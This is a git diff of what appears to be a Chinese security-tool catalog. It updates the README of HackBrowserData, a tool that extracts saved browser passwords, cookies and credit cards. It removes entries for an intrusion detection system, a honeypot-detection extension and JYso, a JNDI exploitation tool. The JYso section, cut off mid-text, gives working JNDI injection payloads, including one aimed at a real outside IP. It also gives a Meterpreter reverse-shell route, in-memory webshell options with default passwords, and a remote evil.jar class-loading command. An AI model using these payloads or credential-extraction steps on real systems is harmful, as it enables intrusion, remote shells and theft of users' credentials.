-| Google Chrome Beta |  ✅  |   ✅    |  ✅  |  ✅   |
-| Chromium           |  ✅  |   ✅    |  ✅  |  ✅   |
-| Microsoft Edge     |  ✅  |   ✅    |  ✅  |  ✅   |
-| 360 极速浏览器          |  ✅  |   ✅    |  ✅  |  ✅   |
-| QQ                 |  ✅  |   ✅    |  ✅  |  ✅   |
-| Brave              |  ✅  |   ✅    |  ✅  |  ✅   |
-| Opera              |  ✅  |   ✅    |  ✅  |  ✅   |
-| OperaGX            |  ✅  |   ✅    |  ✅  |  ✅   |
-| Vivaldi            |  ✅  |   ✅    |  ✅  |  ✅   |
-| Yandex             |  ✅  |   ✅    |  ✅  |  ✅   |
-| CocCoc             |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox            |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Beta       |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Dev        |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox ESR        |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Nightly    |  ✅  |   ✅    |  ✅  |  ✅   |
-| IE 浏览器             |  ❌  |   ❌    |  ❌  |  ❌   |
+| 浏览器        | 密码 | Cookie | 书签 | 历史记录 |
+| :------- | :------: | :----: | :------: | :-----: |
+| Google Chrome|    ✅     |   ✅    |    ✅     |    ✅    |
+| Google Chrome Beta|    ✅    |   ✅   |    ✅    |    ✅    |
+| Chromium |    ✅    |    ✅    |    ✅    |    ✅    |
+| Microsoft Edge|    ✅     |   ✅    |    ✅     |    ✅    |
+| 360 极速浏览器    |    ✅     |   ✅    |    ✅     |    ✅    |
+| QQ 浏览器|    ✅     |   ✅    |    ✅     |    ✅    |
+| Brave 浏览器 |    ✅    |   ✅   |    ✅    |    ✅    |
+| Opera 浏览器 |    ✅    |    ✅    |    ✅    |    ✅    |
+| OperaGX 浏览器 |    ✅    |    ✅    |    ✅    |    ✅    |
+| Vivaldi 浏览器 |    ✅    |    ✅    |    ✅    |    ✅    |
+| Firefox |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Beta |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Dev |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox ESR |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Nightly |    ✅    |   ✅   |    ✅    |    ✅    |
+| IE 浏览器        |    ❌     |   ❌    |    ❌     |    ❌    |
 
 ### MacOS
 
 由于 MacOS 的安全性设置，基于 `Chromium` 内核浏览器解密时**需要当前用户密码**
 
-| 浏览器                | 密码 | Cookie | 书签 | 历史记录 |
-|:-------------------|:--:|:------:|:--:|:----:|
-| Google Chrome      | ✅  |   ✅    | ✅  |  ✅   |
-| Google Chrome Beta | ✅  |   ✅    | ✅  |  ✅   |
-| Chromium           | ✅  |   ✅    | ✅  |  ✅   |
-| Microsoft Edge     | ✅  |   ✅    | ✅  |  ✅   |
-| Brave              | ✅  |   ✅    | ✅  |  ✅   |
-| Opera              | ✅  |   ✅    | ✅  |  ✅   |
-| OperaGX            | ✅  |   ✅    | ✅  |  ✅   |
-| Vivaldi            | ✅  |   ✅    | ✅  |  ✅   |
-| CocCoc             | ✅  |   ✅    | ✅  |  ✅   |
-| Yandex             | ✅  |   ✅    | ✅  |  ✅   |
-| Arc                | ✅  |   ✅    | ✅  |  ✅   |
-| Firefox            | ✅  |   ✅    | ✅  |  ✅   |
-| Firefox Beta       | ✅  |   ✅    | ✅  |  ✅   |
-| Firefox Dev        | ✅  |   ✅    | ✅  |  ✅   |
-| Firefox ESR        | ✅  |   ✅    | ✅  |  ✅   |
-| Firefox Nightly    | ✅  |   ✅    | ✅  |  ✅   |
-| Safari             | ❌  |   ❌    | ❌  |  ❌   |
+| 浏览器                   | 密码 | Cookie | 书签 | 历史记录 |
+| :--------------------------- | :------: | :----: | :------: | :-----: |
+| Google Chrome  |    ✅     |   ✅    |    ✅     |    ✅    |
+| Google Chrome Beta |    ✅    |   ✅   |    ✅    |    ✅    |
+| Chromium |    ✅    |    ✅    |    ✅    |    ✅    |
+| Microsoft Edge |    ✅     |   ✅    |    ✅     |    ✅    |
+| Brave |    ✅    |   ✅   |    ✅    |    ✅    |
+| Opera |    ✅    |    ✅    |    ✅    |    ✅    |
+| OperaGX |    ✅    |    ✅    |    ✅    |    ✅    |
+| Vivaldi |    ✅    |    ✅    |    ✅    |    ✅    |
+| Firefox |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Beta |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Dev |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox ESR |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Nightly |    ✅    |   ✅   |    ✅    |    ✅    |
+| Safari   |    ❌     |   ❌    |    ❌     |    ❌|
 
 ### Linux
 
-| 浏览器                | 密码  | Cookie | 书签  | 历史记录 |
-|:-------------------|:---:|:------:|:---:|:----:|
-| Google Chrome      |  ✅  |   ✅    |  ✅  |  ✅   |
-| Google Chrome Beta |  ✅  |   ✅    |  ✅  |  ✅   |
-| Chromium           |  ✅  |   ✅    |  ✅  |  ✅   |
-| Microsoft Edge     |  ✅  |   ✅    |  ✅  |  ✅   |
-| Brave              |  ✅  |   ✅    |  ✅  |  ✅   |
-| Opera              |  ✅  |   ✅    |  ✅  |  ✅   |
-| Vivaldi            |  ✅  |   ✅    |  ✅  |  ✅   |
-| Chromium           |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox            |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Beta       |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Dev        |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox ESR        |  ✅  |   ✅    |  ✅  |  ✅   |
-| Firefox Nightly    |  ✅  |   ✅    |  ✅  |  ✅   |
+| 浏览器    | 密码 | Cookie | 书签 | 历史记录 |
+| :------------ | :------: | :----: | :------: | :-----: |
+| Google Chrome |    ✅     |   ✅    |    ✅     |    ✅    |
+| Google Chrome Beta |    ✅    |   ✅   |    ✅    |    ✅    |
+| Chromium |    ✅    |    ✅    |    ✅    |    ✅    |
+| Microsoft Edge |    ✅    |   ✅   |    ✅    |    ✅    |
+| Brave |    ✅    |   ✅   |    ✅    |    ✅    |
+| Opera |    ✅    |    ✅    |    ✅    |    ✅    |
+| Vivaldi |    ✅    |    ✅    |    ✅    |    ✅    |
+| Chromium |    ✅     |   ✅    |    ✅     |    ✅    |
+| Firefox |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Beta |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Dev |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox ESR |    ✅    |   ✅   |    ✅    |    ✅    |
+| Firefox Nightly |    ✅    |   ✅   |    ✅    |    ✅    |
 
 ## 安装运行
 ### 安装
@@ -95,14 +86,16 @@
 
 ### 从源码编译
 
-仅支持 `go 1.18+` 以后版本，一些函数使用到了泛型
+支持版本 `go 1.14+`
 
 ``` bash
-$ git clone https://github.com/moonD4rk/HackBrowserData
+git clone https://github.com/moonD4rk/HackBrowserData
+
+cd HackBrowserData
 
-$ cd HackBrowserData/cmd/hack-browser-data
+go get -v -t -d ./...
 
-$ CGO_ENABLED=1 go build
+go build
 ```
 
 ### 跨平台编译
@@ -114,7 +107,7 @@ $ CGO_ENABLED=1 go build
 ``` shell
 brew install mingw-w64
 
-CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc go build
+CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC="x86_64-w64-mingw32-gcc" go build
 ```
 
 #### Linux
@@ -131,97 +124,53 @@ CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_E
 ```
 PS C:\test> .\hack-browser-data.exe -h
 NAME:
-   hack-browser-data - Export password|bookmark|cookie|history|credit card|download|localStorage|extension from browser
+   hack-browser-data - Export passwords/cookies/history/bookmarks from browser
 
 USAGE:
    [hack-browser-data -b chrome -f json -dir results -cc]
-   Export all browingdata(password/cookie/history/bookmark) from browser
-   Github Link: https://github.com/moonD4rk/HackBrowserData
+   Get all data(password/cookie/history/bookmark) from chrome
 
 VERSION:
-   0.5.0
-
+   0.3.6
 GLOBAL OPTIONS:
-   --verbose, --vv                   verbose (default: false)
-   --compress, --zip                 compress result to zip (default: false)
-   --browser value, -b value         available browsers: all|brave|chrome|chrome-beta|chromium|coccoc|edge|firefox|opera|opera-gx|vivaldi|yandex (default: "all")
-   --results-dir value, --dir value  export dir (default: "results")
-   --format value, -f value          file name csv|json (default: "csv")
-   --profile-path value, -p value    custom profile dir path, get with chrome://version
-   --full-export, --full             is export full browsing data (default: true)
-   --help, -h                        show help
-   --version, -v                     print the version
-
-
-PS C:\test> .\hack-browser-data.exe -b all -f json --dir results -zip
-[NOTICE] [browser.go:46,pickChromium] find browser Chrome success  
-[NOTICE] [browser.go:46,pickChromium] find browser Microsoft Edge success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_download.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_password.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_creditcard.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_bookmark.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_cookie.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/microsoft_edge_history.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_history.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_download.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_password.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_creditcard.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_bookmark.json success  
-[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_cookie.json success  
-
+   --verbose, --vv                     verbose (default: false)
+   --compress, --cc                    compress result to zip (default: false)
+   --browser value, -b value           available browsers: all|opera|firefox|chrome|edge (default: "all")
+   --results-dir value, --dir value    export dir (default: "results")
+   --format value, -f value            format, csv|json|console (default: "csv")
+   --profile-dir-path value, -p value  custom profile dir path, get with chrome://version
+   --key-file-path value, -k value     custom key file path
+   --help, -h                          show help (default: false)
+   --version, -v                       print the version (default: false)
+
+PS C:\test>  .\hack-browser-data.exe -b all -f json --dir results --cc
+[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
+[x]:  Get 54 history, filename is results/microsoft_edge_history.json
+[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
+[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
+[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
+[x]:  Get 19 cookies, filename is results/360speed_cookie.json
+[x]:  Get 18 history, filename is results/360speed_history.json
+[x]:  Get 1 passwords, filename is results/360speed_password.json
+[x]:  Get 12 history, filename is results/qq_history.json
+[x]:  Get 1 passwords, filename is results/qq_password.json
+[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
+[x]:  Get 14 cookies, filename is results/qq_cookie.json
+[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
+[x]:  Get 10 cookies, filename is results/firefox_cookie.json
+[x]:  Get 33 history, filename is results/firefox_history.json
+[x]:  Get 1 passwords, filename is results/firefox_password.json
+[x]:  Get 1 passwords, filename is results/chrome_password.json
+[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
+[x]:  Get 6 cookies, filename is results/chrome_cookie.json
+[x]:  Get 6 history, filename is results/chrome_history.json
+[x]:  Compress success, zip filename is results/archive.zip
 ```
 
-### 基于此工具的一些其他项目
-[Sharp-HackBrowserData](https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData)
-
-[Reflective-HackBrowserData](https://github.com/idiotc4t/Reflective-HackBrowserData)
-
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2022-09-08 发布演示视频[404星链计划开源安全工具演示——HackBrowserData](https://www.bilibili.com/video/BV1eU4y1z7si)
 
 ## 最近更新
 
-#### [v0.4.4] - 2022-08-16
-
-**更新**  
-- 修复 chrome 在 windows 上获取 cookie 内容失败的问题  
-- 在 CI 中添加了更多检查  
-- 优化  golangci-lint 代码  
-- 修复压缩结果时无法访问文件的问题
-
-#### [v0.4.3] - 2022-06-05
-
-**更新**  
-- 新增支持从浏览器导出多个用户  
-- 修复当过滤结果为空并导出到 csv 时，对其进行 utf8 编码  
-- 修复 Windows 下 Chrome 和 OperaGx 的配置文件夹  
-- 修复拼写错误
-
-#### [v0.4.2] - 2022-05-01
-
-**更新**  
-- 新增导出扩展
-- 新增设置控制台 log 日志的色彩  
-- 文档添加 HackBrowserData 的 logo
-
-#### [v0.4.1] - 2022-04-20
-
-**更新**  
-- 支持所有浏览器导出 local storage
-- 修复 firefox ans1 数据结构  
-- 修复 windows 平台上 chromium 密钥查找失败的问题
-
-#### [v0.4.0] - 2022-04-18
-
-**更新**  
-- 支持 Go 1.18 泛型，重构项目布局  
-- 添加对所有已发布的 Firefox 的支持  
-- 为命令行日志添加颜色输出  
-- 某些 Linux 发行版的 chromium 现可不使用 D-Bus 获取主密钥  
-- 修复 Chromium cookie 文件路径错误  
-- Windows 下解密 Chromium 密码时增加 AES 块大小检查  
-- 修复 Windows 导出信用卡失败
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Hades.md b/detail/Hades.md
deleted file mode 100644
index 6eca99357..000000000
--- a/detail/Hades.md
+++ /dev/null
@@ -1,35 +0,0 @@
-## Hades <https://github.com/theSecHunter/Hades>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
-![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
-![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-![Time](https://img.shields.io/badge/Join-20220829-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-[English](https://github.com/theSecHunter/Hades/blob/main/README.md) | 中文文档
-
-Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统，其中每个插件均可独立分开运行。
-
-- [Hboat (服务端 demo)](https://github.com/theSecHunter/Hboat)
-- [Hades-Windows](https://github.com/theSecHunter/Hades-Linux) @TimelifeCzy
-- [Hades-Linux](https://github.com/chriskaliX/Hades) @chriskaliX
-
-目前该仓库为其他组件的整合，可以点击上述链接获取组件详情
-
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v1.1.0] - 2023-01-31
-
-**更新**  
-- ebpf插件支持arm64，支持简易端口扫描检测以及其余问题修复  
-- win插件支持进程拦截、注册表拦截、目录保护、注入检测
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Heimdallr.md b/detail/Heimdallr.md
deleted file mode 100644
index b9e81719a..000000000
--- a/detail/Heimdallr.md
+++ /dev/null
@@ -1,139 +0,0 @@
-## Heimdallr <https://github.com/graynjo/Heimdallr>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-JavaScript-blue)
-![Author](https://img.shields.io/badge/Author-graynjo-orange)
-![GitHub stars](https://img.shields.io/github/stars/graynjo/Heimdallr.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.3-red)
-![Time](https://img.shields.io/badge/Join-20221117-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-**Heimdallr**是一款致力于被动嗅探浏览器流量，用于**提示漏洞框架指纹**、**告警拦截蜜罐请求**、**对抗浏览器特征追踪**（浏览器持久化、webRTC、Canvas画布等）的Chrome插件。
-
-![image-20221017154419189](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017154419189.png)
-
-![image-20221017154934546](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017154934546.png)
-
-## 🥑安装
-
-1. GitHub Releases 下载插件最新编译版本
-2. Chrome浏览器-扩展设置-开发者模式-加载已解压的扩展程序
-
-![image-20221017154934546](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221104111153079.png)
-
-> 注意：Chrome版本需高于Chrome v96，部分代码逻辑不适配edge和firefox，请勿混用于非Chrome浏览器
-
-## 🚀使用
-
-### 基本功能
-
-高危漏洞资产指纹识别和蜜罐jsonp请求识别功能无需配置，只要插件开启即可生效。
-
-- 高危漏洞资产指纹识别规则103条，涉及框架或产品如下：
-
-> ueditor、struts2、spring、weblogic、shiro、F5 BIG-IP、致远OA、用友NC、用友畅捷通、通达OA、心通达OA、新点OA、帆软报表、蓝凌OA、红帆OA、华天动力OA、万户OA、金蝶云、协众OA、金和OA、海昌OA、泛微多个产品(ecology、eoffice、ebridge、emobile)、拓尔思SSO、拓尔思内容管理系统、亿邮邮件、coremail邮件、Exchange邮件、若依后台管理系统、Wordpress、小鱼易连云视讯、tomcat、iis、jboss、jetty、ibm websphere、weblogic、thinkphp、showdoc、Laravel、kindeditor、fckeditor、ewebeditor、jeesite、海康威视多个产品（网络摄像头、安防管理平台、图像综合应用平台）、dedecms、jira、confluence、java web、博达站群、dubbo、向日葵客户端、宝塔waf、宝塔面板、米拓cms、teleport堡垒机、齐治堡垒机、帕拉迪堡垒机、H3C堡垒机、绿盟防火墙、安全狗Waf
-
-- 蜜罐特征告警规则151条，涉及敏感域名请求(jsonp)、蜜罐网页资源特征、蜜罐对本机特殊软件（如Burpsuite）的探测请求、网站流量分析与跟踪请求、敏感关键词、敏感脚本调用等。
-
-> 为了保证请求的最全面捕获，Heimdallr中不进行请求种类（如script、XMLHttpRequest等）的筛选，因此插件默认只进行蜜罐请求识别而不作拦截，若开启蜜罐请求拦截会影响正常访问CSDN、Github等网站的正常访问，可以通过日常使用时暂停插件（控制-暂停/开启插件）或关闭蜜罐拦截功能（策略配置-蜜罐拦截配置）解决。
->
-> 因部分框架或产品（如百度网站在线客服会调用5个敏感域名、高德地图嵌入会调用高德域名）的正常使用也会出现Jsonp敏感域名的访问，故同一站点的Jsonp请求超过10个时，基本可以确定为蜜罐站点，此时将会出现系统弹窗告警（弹窗需要操作系统开启浏览器弹窗权限，该权限默认开启）。低于10个的敏感域名请求，使用者可根据当前站点内容和告警域名的关联度进行判断，例如某个小企业官网可能调用百度商桥接口实现在线客服功能，但一般不会调用虎牙直播账号接口或联通一键登录热点溯源接口。
-
-### 控制
-
-右上角三个选项分别为暂停/开启插件、清除所有嗅探结果集、设置选项。
-
-> 暂停插件后，会清空所有页面的嗅探结果集，关闭对请求和响应的监听，扩展功能中仅WebRTC防护功能不关闭，其他的功能都会随插件暂停而暂停。
-
-### 扩展功能
-
-扩展功能由策略配置页面配置
-
-![image-20221017093032294](https://github.com/graynjo/Heimdallr/raw/main/README.assets/image-20221017093032294.png)
-
-#### 被动识别配置-启用响应体规则匹配
-
-- 建议设置：仅在攻击期间对需高度关注页面（口子、靶标）开启该选项，用完即关
-
-> 默认情况下，被动嗅探只对请求响应的URL、Request Header、Request Body、Response Header进行匹配，仅有较少部分高危指纹在Response Body中检测，开启该选项后会启用devtools调用chrome devtools protocol，检测Response Body中的指纹。但是启用该选项后会出现调试提示栏，如需关闭参考高级-4
-
-#### 被动识别配置-关闭浏览器页面缓存（强制刷新）
-
-- 建议设置：默认开启该选项
-
-> 部分包含特征规则的静态资源（如JS文件）会在一次调用后存储在磁盘中，减少重复加载耗费的流量和带宽。这会导致识别规则在重复刷新页面是不会重复触发。开启该选项后可以达到更完善的特征识别，这也可以防止部分情况下静态资源文件不能及时更新导致的访问异常
-
-#### 蜜罐拦截配置-符合蜜罐特征请求自动拦截
-
-- 建议设置：攻击期间开启，日常使用时关闭
-
-> 为保证能够识别、阻断部分新的Jsonp请求，插件按照请求域名进行拦截，这会导致开启该选项后访问部分日常网站（CSDN、GitHub等）会被阻断，影响日常访问。因此默认情况下插件不会拦截疑似蜜罐的Jsonp请求，需要手动开启拦截选项.日常网站被拦截也可以通过右上角的暂停插件按钮暂停，访问结束后重新启动插件。但是更建议的方式为日常使用浏览器和攻击使用浏览器分离开来，专事专用
-
-#### 特征对抗配置-清除所有浏览器持久化项数据
-
-- 建议设置：在被cookie追踪或其他持久化手段追踪浏览器特征时清除数据
-
-> 清除的浏览器持久化项包括：网站应用缓存（appcache）、网站资源缓存、网站缓存存储、Cookie、网络文件系统、表单数据记录、索引数据库（indexDB）、localStorage、密码记录、网络SQL数据（webSQL）
-> 
-> **警告**：清除的数据中包含密码记录，即浏览器的密码管理器的记录。如果你使用浏览器自带的密码管理器和Google账号进行密码记录和维护，清除浏览器的密码管理器记录可能导致Google账号同步的密码被置空。再次建议将攻击主机和日常使用的主机分离，不在攻击主机上登录或保存任何私人有关的账号。
-
-#### 特征对抗配置-WebRTC 防IP泄露严格策略
-
-- 建议设置：安装后手动开启该选项
-
-> 通过提高WebRTC策略严格度防止真实IP泄露，已知Chrome v104（截至2022.9.1）仍存在该漏洞，此选项可在并建议在日常使用时也开启
-> 请勿将此策略与其他WebRTC防护插件（如WebRTC Control或WebRTC Leak Prevent）同时使用，各插件调节WebRTC策略会互相干涉，暂停其他插件的使用时的API调用也会影响Heimdallr的调节逻辑。
-
-#### 特征对抗配置-Canves噪点干扰脚本注入
-
-- 建议设置：攻击期间开启，日常使用时关闭
-
-> 通过对当前网页注入内容脚本增加Canvas画布噪点防止特征锁定，开启后所有网页访问时将会额外加载content.js用于画布类的函数hook操作
-
-
-
-## 🔔高级
-
-1. 插件的识别对象基于【标签页】，标签页页面变更【(域名+端口)或(IP+端口)】时清空结果，切换标签页时结果会暂存，关闭标签页或窗口时删除对应结果。
-2. 插件默认只存在被动流量监控，不会因为敏感指纹的识别触发防火墙处置。
-3. 插件识别结果为页面及页面子框架的请求内容，部分页面告警【请求体数据为json格式】、【请求头Content-Type为application/json格式】时，不一定是当前document的请求，有可能是当前document页加载的相关页面的接口请求匹配了规则.
-4. 因为谷歌Chrome API的安全限制和Chrome内核的历史遗留问题，插件对响应体Body的检查与其他指纹位置的检查不同，浏览器页面顶部会出现调试提示，可通过插件设置关闭响应包检查功能或添加谷歌浏览器的启动项规避提示（在Chrome快捷方式右键打开属性，在快捷方式栏的【目标】框添加启动参数 `--silent-debugger-extension-api`）。
-5. 插件目的为发现直接访问无法识别的组件或框架，请勿添加可以直接识别的组件的特征到指纹库（如spark未授权页面），增加无意义的识别流程导致识别负担增加。
-
-
-## 🎇继续开发
-
-#### 新增指纹
-
-在实战中遇到有意义的高危指纹特征或未在拦截列表中的蜜罐请求特征都可以打开新的issue提交，作者会尽快在验证可用性后将指纹添加到新的版本中。
-
-#### 二次开发
-
-Vue3前端模块
-
-```
-cd Vue_popup\heimdallr_v3
-npm install
-npm run build:watch
-vim src\App.vue
-```
-
-chrome插件模块
-
-```
-cd .\Heimdallr\
-```
-
-指纹模块
-
-```
-cd .\Heimdallr\resource\data
-vim data.js
-```
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/JYso.md b/detail/JYso.md
deleted file mode 100644
index cd4c95eca..000000000
--- a/detail/JYso.md
+++ /dev/null
@@ -1,551 +0,0 @@
-## JYso <https://github.com/qi4L/JYso>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![Author](https://img.shields.io/badge/Author-qi4L-orange)
-![GitHub stars](https://img.shields.io/github/stars/qi4L/JYso.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.4.0-red)
-![Time](https://img.shields.io/badge/Join-20230626-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-# 😈使用说明
-
-```所有使用示例，用的是Yakit的FUZZ语法```
-
-使用 ```java -jar JNDIExploit-[version].jar -h``` 查看参数说明，其中 ```--ip``` 参数为必选参数
-
-```
-Usage: java -jar JNDIExploit-[version].jar [options]
-  Options:
-  * -i,  --ip       Local ip address  (default: 0.0.0.0)
-    -rP, --rmiPort  rmi bind port (default: 1099)
-    -lP, --ldapPort Ldap bind port (default: 1389)
-    -hP, --httpPort Http bind port (default: 3456)
-    -g,  --gadgets   Show gadgets (default: false)
-    -c,  --command  RMI this command
-    -h,  --help     Show this help
-```
-
-* 目前支持的所有 ```PayloadType``` 为
-    * ```Bypass```: 用于rmi本地工厂类加载，通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
-    * ```TomcatEcho```: 用于在中间件为 ```Tomcat``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami```
-      的方式传递想要执行的命令
-    * ```SpringEcho```: 用于在框架为 ```SpringMVC/SpringBoot```
-      时命令执行结果的回显，通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
-    * ```JbossEcho```: Jboss 命令执行回显, 通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
-    * ```AllEcho```: 自动选择命令执行回显, 通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
-    * ```nu1r```：用于执行命令，如果命令有特殊字符，支持对命令进行 Base64编码后传输
-
-```
-{{url
-  (${jndi:ldap://0.0.0.0:1389/TomcatBypass/nu1r/Base64/{{base64
-      (ping xxx.dnstunnel.run)
-  }}})
-}}
-```    
-
-- 支持tomcatBypass路由直接上线msf：
-
-```
-  使用msf的java/meterpreter/reverse_tcp开启监听
-  ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/msf/[msfip]/[msfport]
-```
-
----
-
-# 🦄内存马
-
-两种添加方式：
-
-- 支持引用远程类加载方式打入（Basic路由）。
-- 支持本地工厂类加载方式打入（TomcatBypass路由）。
-
-使用说明：
-不指定类型就默认为冰蝎马。
-
-- t 选择内存马的类型
-    - 不指定类型就默认为冰蝎马
-    - bx: 冰蝎内存马，```key: nu1ryyds```, ```Referer：https://nu1r.cn/```
-    - gz: 哥斯拉内存马，```pass: nu1r```, ```Referer：https://nu1r.cn/```
-    - gzraw: 哥斯拉 raw 类型的内存马, ```pass: nu1r```, ```Referer：https://nu1r.cn/```
-    - cmd: cmd命令回显内存马。
-- a：是否继承恶意类 AbstractTranslet
-- o：使用反射绕过
-- w：Windows下使用Agent写入
-- l：Linux下使用Agent写入
-- u：内存马绑定的路径,default [/version.txt]
-- pw：内存马的密码,default [p@ssw0rd]
-- r：内存马 Referer check,default [https://nu1r.cn/]
-- h：通过将文件写入$JAVA_HOME来隐藏内存shell，目前只支持 SpringControllerMS
-- ht：隐藏内存外壳，输入1:write /jre/lib/charsets.jar 2:write /jre/classes/
-
-示例
-
-```shell
-{{url
-    (${jndi:ldap://111.229.10.212:1389/Basic/tomcatfilterjmx/shell/-u path223 -pw 123456 -r tth.cn})
-}}
-```
-
-内存马说明：
-
-* ```SpringInterceptor```: 向系统内植入 Spring Interceptor 类型的内存马
-* ```SpringController```: 向系统内植入 Spring Controller 类型的内存马
-* ```JettyFilter```: 利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
-* ```JettyServlet```: 利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
-* ```JBossFilter```: 通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
-* ```JBossServlet```: 通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
-* ```resinFilterTh```: 通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
-* ```resinServletTh```: 通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
-* ```WebsphereMemshell```: 用于植入```Websphere内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```
-* ```tomcatFilterJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
-* ```tomcatFilterTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
-* ```TomcatListenerJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
-* ```TomcatListenerTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
-* ```TomcatServletJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
-* ```TomcatServletTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
-* ```WSFilter```: `CMD` 命令回显 WebSocket 内存马，`cmd命令回显`
-* ```TomcatExecutor``` : Executor 内存马，`cmd命令回显`
-* ```TomcatUpgrade```: TomcatUpgrade 内存马，`cmd命令回显`
-* ```Struts2ActionMS```: Action 类型内存马
-
----
-
-# 👻 BeanShell1 与 Clojure 利用链的拓展
-
-对于 `BeanShell1` 及 `Clojure` 这两个基于脚本语言解析的漏利用方式。
-
-本项目为这两条利用链拓展了除了 Runtime 执行命令意外的多种利用方式，具体如下：
-
-`Base64/`后的内容需要base64编码
-
-TS ：Thread Sleep - 通过 Thread.sleep() 的方式来检查是否存在反序列化漏洞，使用命令：TS-10
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
-        (TS-10)
-    }}})
-}}
-```
-
-RC ：Remote Call - 通过 URLClassLoader.loadClass()
-来调用远程恶意类并初始化，使用命令：RC-http://xxxx.com/evil.jar#EvilClass
-
